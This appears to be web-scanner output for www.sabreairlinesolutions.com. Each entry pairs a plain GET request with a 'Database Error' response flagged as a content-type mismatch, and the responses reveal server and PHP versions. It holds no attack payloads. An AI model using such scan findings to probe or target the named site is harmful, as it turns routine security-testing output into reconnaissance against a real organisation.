GET /home/products_services/enterprise_operations/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:51:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/manage_change/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:35:51 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/sabre_aircentre_crew/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322006; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fsabre_emd_manager%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A3%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:33:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/sabre_aircentre_flight/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322057; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/enterprise_operations/sabre_aircentre_maintenance/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322146; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:34:20 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/corporate_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322800; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:04:01 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/developer_tool HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322800; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_group_ecommerce%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:26:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/electronic_ticketing_for_third-party_ground_handling HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322840; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_manager%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airport_data_intelligence%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:29:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/frequent_flyer_management HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322833; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:07 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/gds_electronic_ticketing HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322843; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/interact_interface HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322857; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A2%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A3%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:11 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/interline_electronic_ticketing_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322858; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3Bi%3A1%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fleet_manager%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:30:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_gate_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322646; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_gate_planner HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322647; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fproduct%2Fagency_management%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_load_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322650; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/product/sabre_aircentre_movement_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322675; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
